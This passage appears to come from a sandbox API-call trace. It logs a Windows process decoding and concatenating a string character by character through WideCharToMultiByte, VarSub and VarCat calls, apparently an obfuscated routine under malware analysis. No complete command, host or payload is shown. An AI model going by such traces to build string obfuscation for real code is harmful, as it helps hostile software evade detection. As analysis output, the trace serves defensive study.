lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.760] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.761] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.761] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.762] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.762] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0172.763] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.763] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.763] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.764] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0172.764] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.765] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0172.765] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.766] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.766] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.767] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.767] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.767] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0172.768] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.768] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0172.768] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=">", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=">\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.769] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0172.769] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.836] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.836] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.836] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0172.837] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.837] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.838] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.838] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.838] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.839] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.839] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.840] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.840] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.841] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.841] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.842] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.842] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.843] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.843] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.844] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.844] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.845] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.845] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.846] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0172.846] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.847] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.847] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.848] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0172.848] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.849] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0172.849] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.850] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.850] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.851] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.851] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.852] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.852] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.853] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.853] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.853] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0172.854] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.854] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.855] VarCat (in: pvarLeft=0x28fa60, pvarRight=0x28f890, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.856] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.856] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.856] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0172.857] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.857] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.857] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.858] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.858] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 